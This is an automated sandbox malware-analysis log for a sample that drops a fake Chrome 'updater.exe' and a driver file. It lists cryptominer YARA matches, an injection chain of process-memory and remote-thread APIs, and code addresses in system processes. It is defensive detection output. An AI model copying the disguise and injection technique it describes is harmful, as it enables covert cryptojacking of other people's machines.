Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000011.00000003.1846316422.000001D5599B5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq

Operating System Destruction

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Process information set: 01 00 00 00

System Summary

Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\System32\dialer.exe Code function: 4_2_00007FF78AB310C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 4_2_00007FF78AB310C0
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC642A7C NtEnumerateValueKey,NtEnumerateValueKey, 7_2_00000225DC642A7C
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AE21CC NtQuerySystemInformation,StrCmpNIW, 8_2_00000202C0AE21CC
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AE26F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW, 8_2_00000202C0AE26F0
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE292A7C NtEnumerateValueKey,NtEnumerateValueKey, 10_2_000002BAAE292A7C
Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001845B3B23F0 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread, 15_2_000001845B3B23F0
Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001845B3B21CC NtQuerySystemInformation,StrCmpNIW, 15_2_000001845B3B21CC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
Source: C:\Windows\System32\dialer.exe Code function: 4_2_00007FF78AB314E4 4_2_00007FF78AB314E4
Source: C:\Windows\System32\dialer.exe Code function: 4_2_00007FF78AB32328 4_2_00007FF78AB32328
Source: C:\Windows\System32\dialer.exe Code function: 4_2_00007FF78AB326E8 4_2_00007FF78AB326E8
Source: C:\Windows\System32\dialer.exe Code function: 4_2_00007FF78AB31DB4 4_2_00007FF78AB31DB4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9B7F52FA 5_2_00007FFD9B7F52FA
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC621658 7_2_00000225DC621658
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC61B23C 7_2_00000225DC61B23C
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC61F2F8 7_2_00000225DC61F2F8
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC61B030 7_2_00000225DC61B030
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6120DC 7_2_00000225DC6120DC
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC652258 7_2_00000225DC652258
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC64BE3C 7_2_00000225DC64BE3C
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC64FEF8 7_2_00000225DC64FEF8
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC64BC30 7_2_00000225DC64BC30
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC642CDC 7_2_00000225DC642CDC
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC681658 7_2_00000225DC681658
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC67B23C 7_2_00000225DC67B23C
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC67F2F8 7_2_00000225DC67F2F8
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC67B030 7_2_00000225DC67B030
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6720DC 7_2_00000225DC6720DC
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6B2258 7_2_00000225DC6B2258
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6ABE3C 7_2_00000225DC6ABE3C
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6AFEF8 7_2_00000225DC6AFEF8
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6ABC30 7_2_00000225DC6ABC30
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC6A2CDC 7_2_00000225DC6A2CDC
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AC1658 8_2_00000202C0AC1658
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0ABB23C 8_2_00000202C0ABB23C
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0ABF2F8 8_2_00000202C0ABF2F8
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0ABB030 8_2_00000202C0ABB030
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AB20DC 8_2_00000202C0AB20DC
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AF2258 8_2_00000202C0AF2258
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AEBE3C 8_2_00000202C0AEBE3C
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AEFEF8 8_2_00000202C0AEFEF8
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AEBC30 8_2_00000202C0AEBC30
Source: C:\Windows\System32\lsass.exe Code function: 8_2_00000202C0AE2CDC 8_2_00000202C0AE2CDC
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A6612DF2F8 9_2_000002A6612DF2F8
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A6612E1658 9_2_000002A6612E1658
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A6612DB23C 9_2_000002A6612DB23C
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A6612DB030 9_2_000002A6612DB030
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A6612D20DC 9_2_000002A6612D20DC
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A66130FEF8 9_2_000002A66130FEF8
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A661312258 9_2_000002A661312258
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A66130BE3C 9_2_000002A66130BE3C
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A66130BC30 9_2_000002A66130BC30
Source: C:\Windows\System32\svchost.exe Code function: 9_2_000002A661302CDC 9_2_000002A661302CDC
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE26B23C 10_2_000002BAAE26B23C
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE271658 10_2_000002BAAE271658
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE26F2F8 10_2_000002BAAE26F2F8
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE26B030 10_2_000002BAAE26B030
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE2620DC 10_2_000002BAAE2620DC
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE29BE3C 10_2_000002BAAE29BE3C
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE2A2258 10_2_000002BAAE2A2258
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE29FEF8 10_2_000002BAAE29FEF8
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE29BC30 10_2_000002BAAE29BC30
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAE292CDC 10_2_000002BAAE292CDC
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAED91658 10_2_000002BAAED91658
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAED8B23C 10_2_000002BAAED8B23C
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAED8F2F8 10_2_000002BAAED8F2F8
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAED8B030 10_2_000002BAAED8B030
Source: C:\Windows\System32\dwm.exe Code function: 10_2_000002BAAED820DC 10_2_000002BAAED820DC
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A879920DC 11_2_0000026A879920DC
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A8799B030 11_2_0000026A8799B030
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A8799F2F8 11_2_0000026A8799F2F8
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A8799B23C 11_2_0000026A8799B23C
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A879A1658 11_2_0000026A879A1658
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A879C2CDC 11_2_0000026A879C2CDC
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A879CBC30 11_2_0000026A879CBC30
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A879CFEF8 11_2_0000026A879CFEF8
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A879CBE3C 11_2_0000026A879CBE3C
Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000026A879D2258 11_2_0000026A879D2258
Source: C:\Windows\System32\svchost.exe Code function: 12_2_0000017953781658 12_2_0000017953781658
Source: C:\Windows\System32\svchost.exe Code function: 12_2_000001795377B23C 12_2_000001795377B23C
Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000179537720DC 12_2_00000179537720DC
Source: C:\Windows\System32\svchost.exe Code function: 12_2_000001795377B030 12_2_000001795377B030
Source: C:\Windows\System32\svchost.exe Code function: 12_2_000001795377F2F8 12_2_000001795377F2F8
Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000179537B2258 12_2_00000179537B2258
Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000179537ABE3C 12_2_00000179537ABE3C
Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000179537A2CDC 12_2_00000179537A2CDC
Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000179537ABC30 12_2_00000179537ABC30
Source: C:\Windows\System32\svchost.exe Code function: 12_2_00000179537AFEF8 12_2_00000179537AFEF8
Source: C:\Windows\System32\svchost.exe Code function: 12_2_0000017953D52258 12_2_0000017953D52258
Source: C:\Windows\System32\svchost.exe Code function: 12_2_0000017953D4BE3C 12_2_0000017953D4BE3C
Source: C:\Windows\System32\svchost.exe Code function: 12_2_0000017953D42CDC 12_2_0000017953D42CDC
Source: C:\Windows\System32\svchost.exe Code function: 12_2_0000017953D4BC30 12_2_0000017953D4BC30
Source: C:\Windows\System32\svchost.exe Code function: 12_2_0000017953D4FEF8 12_2_0000017953D4FEF8
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D541658 13_2_000002295D541658
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D53B23C 13_2_000002295D53B23C
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D53F2F8 13_2_000002295D53F2F8
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D53B030 13_2_000002295D53B030
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D5320DC 13_2_000002295D5320DC
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D572258 13_2_000002295D572258
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D56BE3C 13_2_000002295D56BE3C
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D56FEF8 13_2_000002295D56FEF8
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D56BC30 13_2_000002295D56BC30
Source: C:\Windows\System32\svchost.exe Code function: 13_2_000002295D562CDC 13_2_000002295D562CDC
Source: C:\Windows\System32\svchost.exe Code function: 14_2_00000253067E1658 14_2_00000253067E1658
Source: C:\Windows\System32\svchost.exe Code function: 14_2_00000253067DB23C 14_2_00000253067DB23C
Source: C:\Windows\System32\svchost.exe Code function: 14_2_00000253067DF2F8 14_2_00000253067DF2F8
Source: C:\Windows\System32\svchost.exe Code function: 14_2_00000253067DB030 14_2_00000253067DB030
Source: C:\Windows\System32\svchost.exe Code function: 14_2_00000253067D20DC 14_2_00000253067D20DC
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000025306E72258 14_2_0000025306E72258
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000025306E6BE3C 14_2_0000025306E6BE3C
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000025306E6FEF8 14_2_0000025306E6FEF8
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000025306E62CDC 14_2_0000025306E62CDC
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000025306E6BC30 14_2_0000025306E6BC30
Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001845B3BBC30 15_2_000001845B3BBC30
Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001845B3B2CDC 15_2_000001845B3B2CDC
Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001845B3BBE3C 15_2_000001845B3BBE3C
Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001845B3C2258 15_2_000001845B3C2258
Source: C:\Windows\System32\svchost.exe Code function: 15_2_000001845B3BFEF8 15_2_000001845B3BFEF8
Source: C:\Windows\System32\svchost.exe Code function: 16_2_000001ADECD42CDC 16_2_000001ADECD42CDC
Source: C:\Windows\System32\svchost.exe Code function: 16_2_000001ADECD4BC30 16_2_000001ADECD4BC30
Source: C:\Windows\System32\svchost.exe Code function: 16_2_000001ADECD4FEF8 16_2_000001ADECD4FEF8
Source: C:\Windows\System32\svchost.exe Code function: 16_2_000001ADECD52258 16_2_000001ADECD52258
Source: C:\Windows\System32\svchost.exe Code function: 16_2_000001ADECD4BE3C 16_2_000001ADECD4BE3C
Source: C:\Windows\System32\svchost.exe Code function: 17_2_000001D5590420DC 17_2_000001D5590420DC
Source: C:\Windows\System32\svchost.exe Code function: 17_2_000001D55904B030 17_2_000001D55904B030
Source: C:\Windows\System32\svchost.exe Code function: 17_2_000001D55904B23C 17_2_000001D55904B23C
Source: C:\Windows\System32\svchost.exe Code function: 17_2_000001D559051658 17_2_000001D559051658
Source: C:\Windows\System32\svchost.exe Code function: 17_2_000001D55904F2F8 17_2_000001D55904F2F8
Source: C:\Windows\System32\svchost.exe Code function: 17_2_000001D559072CDC 17_2_000001D559072CDC
Source: C:\Windows\System32\svchost.exe Code function: 17_2_000001D55907BC30 17_2_000001D55907BC30
Source: C:\Windows\System32\svchost.exe Code function: 17_2_000001D55907BE3C 17_2_000001D55907BE3C
Source: C:\Windows\System32\svchost.exe Code function: 17_2_000001D559082258 17_2_000001D559082258
Source: C:\Windows\System32\svchost.exe Code function: 17_2_000001D55907FEF8 17_2_000001D55907FEF8
Source: C:\Windows\System32\svchost.exe Code function: 18_2_00000241A9EB2258 18_2_00000241A9EB2258
Source: C:\Windows\System32\svchost.exe Code function: 18_2_00000241A9EA2CDC 18_2_00000241A9EA2CDC
Source: C:\Windows\System32\svchost.exe Code function: 18_2_00000241A9EABC30 18_2_00000241A9EABC30
Source: C:\Windows\System32\svchost.exe Code function: 18_2_00000241A9EAFEF8 18_2_00000241A9EAFEF8
Source: C:\Windows\System32\svchost.exe Code function: 18_2_00000241A9EABE3C 18_2_00000241A9EABE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C1AB030 21_2_000002152C1AB030
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C1A20DC 21_2_000002152C1A20DC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C1AB23C 21_2_000002152C1AB23C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C1B1658 21_2_000002152C1B1658
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C1AF2F8 21_2_000002152C1AF2F8
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C3EBC30 21_2_000002152C3EBC30
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C3E2CDC 21_2_000002152C3E2CDC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C3F2258 21_2_000002152C3F2258
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C3EBE3C 21_2_000002152C3EBE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C3EFEF8 21_2_000002152C3EFEF8
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C89B030 21_2_000002152C89B030
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C8920DC 21_2_000002152C8920DC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C89B23C 21_2_000002152C89B23C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C8A1658 21_2_000002152C8A1658
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe Code function: 21_2_000002152C89F2F8 21_2_000002152C89F2F8
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001CD7316B23C 24_2_000001CD7316B23C
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001CD73171658 24_2_000001CD73171658
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001CD7316F2F8 24_2_000001CD7316F2F8
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001CD7316B030 24_2_000001CD7316B030
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001CD731620DC 24_2_000001CD731620DC
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001CD7319BE3C 24_2_000001CD7319BE3C
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001CD731A2258 24_2_000001CD731A2258
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001CD7319FEF8 24_2_000001CD7319FEF8
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001CD7319BC30 24_2_000001CD7319BC30
Source: C:\Windows\System32\svchost.exe Code function: 24_2_000001CD73192CDC 24_2_000001CD73192CDC
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E8620DC 26_2_000002824E8620DC
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E86B23C 26_2_000002824E86B23C
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E86F2F8 26_2_000002824E86F2F8
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E871658 26_2_000002824E871658
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E86B030 26_2_000002824E86B030
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E892CDC 26_2_000002824E892CDC
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E89BE3C 26_2_000002824E89BE3C
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E89FEF8 26_2_000002824E89FEF8
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E8A2258 26_2_000002824E8A2258
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E89BC30 26_2_000002824E89BC30
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E8F2CDC 26_2_000002824E8F2CDC
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E8FBE3C 26_2_000002824E8FBE3C
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E8FFEF8 26_2_000002824E8FFEF8
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E902258 26_2_000002824E902258
Source: C:\Windows\System32\svchost.exe Code function: 26_2_000002824E8FBC30 26_2_000002824E8FBC30
Source: C:\Windows\System32\svchost.exe Code function: 27_2_0000021B473D1658 27_2_0000021B473D1658
Source: C:\Windows\System32\svchost.exe Code function: 27_2_0000021B473CB23C 27_2_0000021B473CB23C
Source: C:\Windows\System32\svchost.exe Code function: 27_2_0000021B473C20DC 27_2_0000021B473C20DC
Source: C:\Windows\System32\svchost.exe Code function: 27_2_0000021B473CB030 27_2_0000021B473CB030
Source: C:\Windows\System32\svchost.exe Code function: 27_2_0000021B473CF2F8 27_2_0000021B473CF2F8
Source: C:\Windows\System32\svchost.exe Code function: 27_2_0000021B47B42258 27_2_0000021B47B42258
Source: C:\Windows\System32\svchost.exe Code function: 27_2_0000021B47B3BE3C 27_2_0000021B47B3BE3C
Source: C:\Windows\System32\svchost.exe Code function: 27_2_0000021B47B32CDC 27_2_0000021B47B32CDC
Source: C:\Windows\System32\svchost.exe Code function: 27_2_0000021B47B3BC30 27_2_0000021B47B3BC30
Source: C:\Windows\System32\svchost.exe Code function: 27_2_0000021B47B3FEF8 27_2_0000021B47B3FEF8
Source: updater.exe.0.dr Static PE information: Number of sections : 11 > 10
Source: ylVAEHbMLf.exe Static PE information: Number of sections : 11 > 10
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: classification engine Classification label: mal100.troj.evad.mine.winEXE@24/79@0/2
Source: C:\Windows\System32\dialer.exe Code function: 4_2_00007FF78AB32328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx, 4_2_00007FF78AB32328
